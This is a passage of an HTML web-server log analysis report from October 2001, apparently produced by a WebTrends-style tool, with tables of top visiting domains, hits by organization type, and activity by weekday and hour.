FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><A href="http://rs.internic.net/cgi-bin/whois?cambrian.mb.ca">cambrian.mb.ca</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">655</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.03%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><A href="http://rs.internic.net/cgi-bin/whois?nipr.mil">nipr.mil</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">468</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.74%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">31</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD>&nbsp;</TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Subtotal For Companies Above</B></TD> <TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>19183</B></TD> <TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>30.43%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5710</B></TD> </TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Log File</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>63026</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>10898</B></TD> </TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopSuffixes"><!--Visitors & Demographics::Organization Breakdown--></A> <!-- WT_H1>Organization Breakdown</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Organization Breakdown</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section provides a breakdown by types of organizations (.com, .net, .edu, .org, .mil, and .gov.) This information can only be displayed if reverse DNS lookups have been performed.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index11.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>5, .3, 2.7, 1 , 1 , 1 </WT_TABLE_STATS --> <CENTER><B>Organization Breakdown</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Organization Breakdown</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Organization</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Company</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20642</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">49.1%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5715</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Network</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16930</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">40.27%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1410</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Education</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2774</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.59%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">259</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Military</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">871</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.07%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">61</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Organization</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">411</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.97%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">34</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Government</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">396</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.94%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Arpanet</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.03%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>42040</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>7495</B></TD> </TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <!-- ---- ---- --> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="ActivityStats"><!--Activity Statistics::Summary of Activity for Report Period--></A> <!-- WT_H1>Summary of Activity for Report Period</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Summary of Activity for Report Period</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section outlines general server activity, comparing the level of activity on weekdays and weekends. The Average Number of Users and Hits on Weekdays are the averages for each individual week day. The Average Number of Users and Hits for Weekends groups Saturday and Sunday together. Values in the table do not include erred hits.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <!-- ---- ---- --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=2 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>2, 4, 2</WT_TABLE_STATS --> <!-- WT_NO_COLUMN_TITLES --> <CENTER><B>Summary of Activity for Report Period</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Summary of Activity for Report Period</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Average Number of <I><B>Users</B></I> per day on Weekdays</TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">129</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Average Number of <I><B>Hits</B></I> per day on Weekdays</TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">805</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Average Number of <I><B>Users</B></I> for the entire Weekend</TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">208</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Average Number of <I><B>Hits</B></I> for the entire Weekend</TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">945</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Most Active Day of the Week</TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Tue</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Least Active Day of the Week</TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Sat</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Most Active Day Ever</TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">October 09, 2001</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Number of Hits on Most Active Day</TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">7019</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Least Active Day Ever</TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">October 26, 2001</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Number of Hits on Least Active Day</TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">29</TD></TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> <!-- ---- ---- --> ><HR><P> </BODY> <!-- ---- ---- --> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopBandwidth"><!--Activity Statistics::Summary of Activity by Time Increment--></A> <!-- WT_H1>Summary of Activity by Time Increment</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Summary of Activity by Time Increment</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section helps you understand the bandwidth requirements of the site by indicating the volume of activity in kilobytes transferred. The table provides various measures of activity by unit of time for the report period (the unit of time depends on the amount of time covered by the report, and will be the day in most cases).<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index12.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopWeekdays"><!--Activity Statistics::Activity Level by Day of Week--></A> <!-- WT_H1>Activity Level by Day of Week</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Activity Level by Day of Week</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section shows the activity for each day of the week for the report period (i.e. if there are two Mondays in the report period, the value presented is the sum of all hits for both Mondays.) Values in the table do not include erred hits. <!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index13.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>5, .3, 2.7, 1 , 1 , 1 </WT_TABLE_STATS --> <CENTER><B>Activity Level by Day of the Week</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Activity Level by Day of Week</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Day</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sun</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7303</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.58%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1546</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mon</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9156</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14.52%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1536</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Tue</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16119</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">25.57%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2275</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Wed</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11077</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">17.57%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1610</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Thu</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7033</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.15%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1385</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Fri</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7355</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.66%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1382</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sat</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4983</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7.9%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1164</TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total Weekdays</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>50740</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>80.5%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>8188</B></TD> </TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total Weekend</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>12286</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>19.49%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>2710</B></TD> </TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopHours"><!--Activity Statistics::Activity Level by Hour--></A> <!-- WT_H1>Activity Level by Hour of the Day</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Activity Level by Hour of the Day</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section shows the most and the least active hour of the day for the report period. The second table breaks down activity for the given report period to show the average activity for each individual hour of the day (if there are several days in the report period, the value presented is the sum of all hits during that period of time for all days). All times are referenced to the location of the system running the analysis.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index14.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=2 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>2, 4, 2</WT_TABLE_STATS --> <!-- WT_NO_COLUMN_TITLES --> <CENTER><B>Activity Level by Hour of the Day</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Activity Level by Hour</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Most Active Hour of the Day</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">18:00-18:59</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Least Active Hour of the Day</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">05:00-05:59</TD></TR> </TABLE></CENTER> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>4, 3, 1 , 1 , 1 </WT_TABLE_STATS --> <CENTER><B>Activity Level by Hours Details</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Activity Level by Hour</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Hour</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B># of Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B># of User Sessions</B></CENTER></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>00:00-00:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1789</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.83%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">378</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>01:00-01:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1580</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.5%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">316</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>02:00-02:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1400</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.22%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">270</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>03:00-03:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">848</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.34%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">203</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>04:00-04:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">882</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.39%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">212</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>05:00-05:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">765</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.21%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">211</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>06:00-06:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1029</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.63%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">264</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>07:00-07:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1697</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.69%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">267</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>08:00-08:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2184</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.46%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">322</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>09:00-09:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3074</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.87%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">479</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10:00-10:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3268</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.18%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">426</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11:00-11:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3310</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.25%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">485</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>12:00-12:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3625</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.75%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">545</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>13:00-13:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4329</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.86%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">514</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14:00-14:59</B></TD><TD 